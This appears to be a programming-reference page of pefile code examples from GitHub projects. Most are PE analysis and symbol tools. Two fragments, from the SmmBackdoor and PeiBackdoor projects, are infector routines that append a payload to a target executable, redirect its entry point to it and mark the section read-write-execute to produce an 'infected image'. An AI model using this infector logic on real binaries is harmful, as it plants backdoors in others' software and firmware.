How to use pefile.SECTION_CHARACTERISTICS in pefile

To help you get started, we’ve selected a few pefile examples, based on popular ways it is used in public projects.


Example from Cr4sh / SmmBackdoor / SmmBackdoor.py (GitHub)
print('Original image size is 0x%.8x' % pe_src.OPTIONAL_HEADER.SizeOfImage)

    # write updated _INFECTOR_CONFIG back to the payload image
    data = _infector_config_set(pe_payload, data, conf_ep_new, conf_ep_old)

    # set new entry point of target image
    pe_src.OPTIONAL_HEADER.AddressOfEntryPoint = \
        last_section.VirtualAddress + last_section.SizeOfRawData + conf_ep_new    

    # update last section size
    last_section.SizeOfRawData += len(data)
    last_section.Misc_VirtualSize = last_section.SizeOfRawData

    # make it executable
    last_section.Characteristics = pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] | \
                                   pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] | \
                                   pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']  

    print('Characteristics of %s section was changed to RWX' % last_section.Name.split('\0')[0])

    # update image headers
    pe_src.OPTIONAL_HEADER.SizeOfImage = last_section.VirtualAddress + last_section.Misc_VirtualSize
    pe_src.DOS_HEADER.e_res = INFECTOR_SIGN    

    print('New entry point RVA is 0x%.8x' % pe_src.OPTIONAL_HEADER.AddressOfEntryPoint)
    print('New %s virtual size is 0x%.8x' % \
          (last_section.Name.split('\0')[0], last_section.Misc_VirtualSize))

    print('New image size is 0x%.8x' % pe_src.OPTIONAL_HEADER.SizeOfImage)

    # get infected image data
    data = pe_src.write() + data
Example from idiom / pftriage / pftriage / cli.py (GitHub)
"Virtual Size",
                                                        "Entropy",
                                                        "Hash")

        for section in target.pe.sections:
            sdata += " {:10}".format(section.Name.strip('\0'))
            sdata += "{:12}".format("{0:#0{1}x}".format(section.SizeOfRawData, 10))
            sdata += "{:18}".format("{0:#0{1}x}".format(section.PointerToRawData, 10))
            sdata += "{:20}".format("{0:#0{1}x}".format(section.VirtualAddress, 10))
            sdata += "{:20}".format("{0:#0{1}x}".format(section.Misc_VirtualSize, 10))
            sdata += "{:<20}".format(section.get_entropy())
            sdata += "{:<20}".format(hashlib.md5(section.get_data()).hexdigest())
            sdata += "\n"

    else:
        cflags = pefile.retrieve_flags(pefile.SECTION_CHARACTERISTICS, 'IMAGE_SCN_')

        sdata = '\n ---- Detailed Section Info ----  \n\n'
        for section in target.pe.sections:
            sdata += " {:10}\n".format(section.Name.strip('\0'))
            sdata += "  {:24} {:>10}\n".format("|-Entropy:", section.get_entropy())
            sdata += "  {:24} {:>10}\n".format("|-MD5 Hash:", hashlib.md5(section.get_data()).hexdigest())
            sdata += "  {:24} {:>10} ({:})\n".format("|-Raw Data Size:", "{0:#0{1}x}".format(section.SizeOfRawData, 10),
                                                     section.SizeOfRawData)
            sdata += "  {:24} {:>10}\n".format("|-Raw Data Pointer:", "{0:#0{1}x}".format(section.PointerToRawData, 10))
            sdata += "  {:24} {:>10}\n".format("|-Virtual Address:", "{0:#0{1}x}".format(section.VirtualAddress, 10))
            sdata += "  {:24} {:>10} ({:})\n".format("|-Virtual Size:", "{0:#0{1}x}".format(section.Misc_VirtualSize, 10),
                                                     section.Misc_VirtualSize)
            sdata += "  {:24} {:>10}\n".format("|-Characteristics:", "{0:#0{1}x}".format(section.Characteristics, 10))
            for flag in cflags:
                if getattr(section, flag[0]):
                    sdata += "  {:24}{:>5}{:<24}\n".format('|', '|-', str(flag[0]))
Example from idiom / pftriage / pftriage.py (GitHub)
sdata += "\n"

        # Check for overlay
        if overlay > 0:
            overlay_size = target.filesize - overlay
            sdata += " {:12}".format('.overlay')
            sdata += "{:12}".format("{0:#0{1}x}".format(overlay_size, 10))
            sdata += "{:18}".format(hex(overlay))
            sdata += "{:20}".format('0x00000000')
            sdata += "{:20}".format('0x00000000')
            sdata += "{:<20}".format('0')
            sdata += "{:<20}".format('N/A')
            sdata += "\n"

    else:
        cflags = pefile.retrieve_flags(pefile.SECTION_CHARACTERISTICS, 'IMAGE_SCN_')

        sdata = '\n ---- Detailed Section Info ----  \n\n'
        for section in target.pe.sections:
            sdata += " {:10}\n".format(section.Name.strip('\0'))
            sdata += "  {:24} {:>10}\n".format("|-Entropy:", section.get_entropy())
            sdata += "  {:24} {:>10}\n".format("|-MD5 Hash:", hashlib.md5(section.get_data()).hexdigest())
            sdata += "  {:24} {:>10} ({:})\n".format("|-Raw Data Size:", "{0:#0{1}x}".format(section.SizeOfRawData, 10),
                                                     section.SizeOfRawData)
            sdata += "  {:24} {:>10}\n".format("|-Raw Data Pointer:", "{0:#0{1}x}".format(section.PointerToRawData, 10))
            sdata += "  {:24} {:>10}\n".format("|-Virtual Address:", "{0:#0{1}x}".format(section.VirtualAddress, 10))
            sdata += "  {:24} {:>10} ({:})\n".format("|-Virtual Size:", "{0:#0{1}x}".format(section.Misc_VirtualSize, 10),
                                                     section.Misc_VirtualSize)
            sdata += "  {:24} {:>10}\n".format("|-Characteristics:", "{0:#0{1}x}".format(section.Characteristics, 10))
            for flag in cflags:
                if getattr(section, flag[0]):
                    sdata += "  {:24}{:>5}{:<24}\n".format('|', '|-', str(flag[0]))
Example from KoreLogicSecurity / mastiff / mastiff / plugins / analysis / EXE / EXE-peinfo.py (GitHub)
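    @staticmethod
    def _dump_section_headers(pe):
        """
        Dump the PE section headers as a text table.

        Args:
            pe: parsed ``pefile.PE`` object; reads ``FILE_HEADER.NumberOfSections``
                and iterates ``pe.sections``.

        Returns:
            str: the section count, a column header and one row per section
            holding its NUL-stripped name, its entropy and the names (minus
            the ``IMAGE_SCN_`` prefix) of the characteristics flags set on it.
        """
        # (name, value) pairs of every IMAGE_SCN_* flag with the prefix removed;
        # pefile exposes each such name as a boolean attribute of a section.
        section_flags = pefile.retrieve_flags(pefile.SECTION_CHARACTERISTICS, 'IMAGE_SCN_')

        rows = [
            '\nNumber of Sections: %d\n' % pe.FILE_HEADER.NumberOfSections,
            '{0:15} {1:8} {2:40}\n'.format('Section Name', 'Entropy', 'Flags'),
            '-' * 65 + '\n',
        ]
        for section in pe.sections:
            # thanks to the pefile example code for this
            flags = [flag[0] for flag in section_flags if getattr(section, flag[0])]

            # Section names are NUL-padded. Depending on the pefile/Python
            # version, Name may be bytes or str; str() on a bytes object would
            # embed a literal "b'...\\x00'" in the table, so decode first and
            # then drop every NUL. latin-1 maps every byte, so decoding cannot
            # raise on arbitrary (attacker-controlled) header bytes.
            name = section.Name
            if isinstance(name, bytes):
                name = name.decode('latin-1')
            name = name.replace('\0', '')

            # the following line was taken from Didier Steven's pecheck.py code
            rows.append('{0:15} {1:<8.5} {2:40}\n'.format(name,
                                                          section.get_entropy(),
                                                          ', '.join(flags)))
        rows.append('\n')
        return ''.join(rows)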
Example from night199uk / gdb-symbol-maker / symbols.py (GitHub)
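symbolfilename = sys.argv[2]
outputfilename = sys.argv[3]

image_base = None
sections = []
symbols = []

# Section layout is taken from the PE itself rather than from the symbol
# listing (see the commented-out section regex further down).
pe = pefile.PE(pefilename)
#print(pe.dump_info())
image_base = pe.OPTIONAL_HEADER.ImageBase

# Only the "section contains code" characteristic decides CODE vs DATA.
code_flag = pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_CNT_CODE']
for section in pe.sections:
	offset = section.VirtualAddress
	length = section.SizeOfRawData
	# Section names are NUL-padded; depending on the pefile/Python version
	# Name may be bytes or str, so normalise to str before stripping the
	# padding (latin-1 maps every byte and cannot raise).
	raw_name = section.Name
	if isinstance(raw_name, bytes):
		raw_name = raw_name.decode('latin-1')
	name = raw_name.strip('\x00')
	kind = "CODE" if section.Characteristics & code_flag else "DATA"
	sections.append(Section(offset, length, name, kind))

# Pseudo-section covering the PE headers: RVA 0 up to the start of the
# first real section.
section = Section(0x0, sections[0].offset, "HEADER", "DATA")
# NOTE(review): inserted at index 1, i.e. after the first real section rather
# than at the front; presumably intentional for the consumer's ordering -- confirm.
sections.insert(1, section)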

file = open(symbolfilename, "r")
for line in file.readlines():

	### Section
	### Does not work as IDA output is broken. Get from the PE directly instead.
#	m = re.match("^\s*([0-9A-Fa-f]+):([0-9A-Fa-f]+)\s+([0-9A-Fa-f]+)H\s+([^s]*)\s+(CODE|DATA)\s*$", line)
#	if m:
#		sec = m.group(1)
Example from Cr4sh / PeiBackdoor / PeiBackdoor.py (GitHub)
# save original entry point address of target image
    conf_ep_old = pe_src.OPTIONAL_HEADER.AddressOfEntryPoint

    # write updated _INFECTOR_CONFIG back to the payload image
    data = _infector_config_set(pe_payload, data, conf_ep_new, conf_ep_old, 0, conf_base)

    # set new entry point of target image
    pe_src.OPTIONAL_HEADER.AddressOfEntryPoint = \
        last_section.VirtualAddress + last_section.SizeOfRawData + conf_ep_new

    # update last section size
    last_section.SizeOfRawData += len(data)
    last_section.Misc_VirtualSize = last_section.SizeOfRawData

    # make it executable
    last_section.Characteristics = pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] | \
                                   pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] | \
                                   pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']

    # update image headers
    pe_src.OPTIONAL_HEADER.SizeOfImage = last_section.VirtualAddress + last_section.Misc_VirtualSize
    pe_src.DOS_HEADER.e_res = INFECTOR_SIGN

    # get infected image data
    data = pe_src.write() + data

    if dst is not None:

        with open(dst, 'wb') as fd:

            # save infected image to the file
            fd.write(data)